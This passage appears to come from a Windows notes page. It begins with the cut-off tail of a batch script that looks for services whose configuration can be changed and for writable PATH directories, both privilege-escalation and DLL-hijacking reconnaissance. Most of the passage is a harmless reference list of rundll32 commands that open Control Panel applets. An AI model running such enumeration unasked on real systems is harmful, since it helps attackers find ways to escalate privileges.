('sc qc "!str!" ^| findstr "ERROR\_CONTROL"') do ( set errCtrl=%%e sc config "!str!" error= !errCtrl! > nul && ( echo Vulnerable service found: !str! ) ) ) REM ================================================= REM = Check for write access to directories in PATH = REM ================================================= echo( echo Finding write access in PATH directories... echo( REM http://stackoverflow.com/a/14879373 for %%A in ("%path:;=";"%") do ( set filename=%%~A\\dll-write-check.txt copy /y nul "!filename!" > nul 2>&1 && ( del "!filename!" echo Writable path directory found: %%A ) )

Link to this headingControl Pannel from Command Line

Control Panel:

rundll32.exe shell32.dll,Control_RunDLL

Link to this headingAccessability Settings (ACCESS.CPL)

Accessability Properties (Keyboard):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1

Accessability Properties (Sound):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2

Accessability Properties (Display):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3

Accessability Properties (Mouse):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4

Accessability Properties (General):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5

Link to this headingAdd/Remove Programs (APPWIZ.CPL)

Add/Remove Programs Properties (Install/Uninstall):

rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1

Add/Remove Programs Properties (Windows Setup):

rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2

Add/Remove Programs Properties (Startup Disk):

rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3

Link to this headingDisplay Settings (DESK.CPL)

Display Properties (Background):

rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0

Display Properties (Screen Saver):

rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1

Display Properties (Appearance):

rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2

Display Properties (Settings):

rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3

Display Properties (Install Screen Saver):

rundll32.exe desk.cpl,InstallScreenSaver %1

(opens .scr at location specified by %1 in preview window)

Link to this headingFindFast Settings (FINDFAST.CPL)

Find Fast Properties (General):

rundll32.exe shell32.dll,Control_RunDLL findfast.cpl

Link to this headingInternet Settings (INETCPL.CPL)

Internet Properties (General):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0

Internet Properties (Security):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,1

Internet Properties (Content):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,2

Internet Properties (Connection):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,3

Internet Properties (Programs):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,4

Internet Properties (Advanced):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,5

Link to this headingRegional Settings (INTL.CPL)

Regional Settings Properties (Regional Settings):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0

Regional Settings Properties (Number):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1

Regional Settings Properties (Currency):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2

Regional Settings Properties (Time):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3

Regional Settings Properties (Date):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4

Regional Settings Properties (Input Locales):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,5

Link to this headingJoystick Settings (JOY.CPL)

Joystick Properties (Joystick):

rundll32.exe shell32.dll,Control_RunDLL joy.cpl

Link to this headingMouse/Keyboard/Printers/Fonts Settings (MAIN.CPL)

Mouse Properties:

rundll32.exe shell32.dll,Control_RunDLL main.cpl @0

Keyboard Properties:

rundll32.exe shell32.dll,Control_RunDLL main.cpl @1

Printers:

rundll32.exe shell32.dll,Control_RunDLL main.cpl @2

Fonts:

rundll32.exe shell32.dll,Control_RunDLL main.cpl @3

Link to this headingMail and Fax Settings (MLCFG32.CPL)

Microsoft Exchange/Outlook Properties (General):

rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl

Link to this headingMultimedia/Sounds Settings (MMSYS.CPL)

Multimedia Properties (Audio):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0

Multimedia Properties (Video):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1

Multimedia Properties (MIDI):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2

Multimedia Properties (CD Music):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3

Multimedia Properties (Advanced/Devices):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4

Sounds Properties:

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1

Link to this headingModem Settings (MODEM.CPL)

Modem Properties (General):

rundll32.exe shell32.dll,Control_RunDLL modem.cpl

Link to this headingNetwork Settings (NETCPL.CPL / NCPA.DLL)

Network (Configuration):

Win9x: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl WinNT: rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl

Dial-up Networking Wizard:

Win9x: rundll32.exe rnaui.dll,RnaWizard

Create Share Dialog:

WinNT: rundll32.exe ntlanui.dll,ShareCreate

Manage Shares Dialog:

WinNT: rundll32.exe ntlanui.dll,ShareManage

Link to this headingODBC Settings (ODBCCP32.CPL)

ODBC Data Source Administrator (General):

rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl

Link to this headingPassword Settings (PASSWORD.CPL)

Password Properties (Change Passwords):

Win9x: rundll32.exe shell32.dll,Control_RunDLL password.cpl

Link to this headingCOM Ports Settings (PORTS.CPL)

COM Ports Properties (General):

WinNT: rundll32.exe shell32.dll,Control_RunDLL ports.cpl

Link to this headingServer Properties (SRVMGR.CPL)

Server Properties (General):

WinNT: rundll32.exe shell32.dll,Control_RunDLL srvmgr.cpl

Link to this headingSystem Settings (SYSDM.CPL)

System Properties (General):

rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0

System Properties (Device Manager):

Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1

System Properties (Performance):

Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3 WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1

System Properties (Environment):

WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2

System Properties (Startup/Shutdown):

WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3

System Properties (Hardware Profiles):

Win95: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2 WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4

System Properties (User Profiles):

WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5

Add New Hardware Wizard:

Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1

Add New Printer Wizard:

Win9x: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter

Link to this headingTelephony Settings (TELEPHON.CPL)

Dialing Properties (My Location / Drivers):

WinNT: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl

Link to this headingThemes Settings (THEMES.CPL)

Themes Properties (General):

rundll32.exe shell32.dll,Control_RunDLL themes.cpl

Link to this headingTime and Date Settings (TIMEDATE.CPL)

Date/Time Properties:

rundll32.exe shell32.dll,Control_RunDLL timedate.cpl

Choose Time Zone:

rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,/f

Link to this headingTweakUI Settings (TWEAKUI.CPL)

TweakUI Dialog (General):

rundll32.exe shell32.dll,Control_RunDLL tweakui.cpl

Link to this headingUPS Settings (UPS.CPL)

Uninteruptable Power Supply Properties (General):

WinNT: rundll32.exe shell32.dll,Control_RunDLL ups.cpl

Link to this headingMicrosoft Mail Postoffice Settings (WGPOCPL.CPL)

Microsoft Workgroup Postoffice Admin:

rundll32.exe shell32.dll,Control_RunDLL wgpocpl.cpl

Link to this headingMiscellaneous File System Dialogs and Wizards

Open With (File Associations):

rundll32.exe shell32.dll,OpenAs_RunDLL d:\path\filename.ext

Run Diskcopy Dialog:

rundll32 diskcopy.dll,DiskCopyRunDll

Create New Shortcut Wizard:

rundll32.exe AppWiz.Cpl,NewLinkHere %1

(creates shortcut at location specified by %1)

Create a Briefcase:

rundll32.exe syncui.dll,Briefcase_Create

View Fonts:

rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder

View Printers:

rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder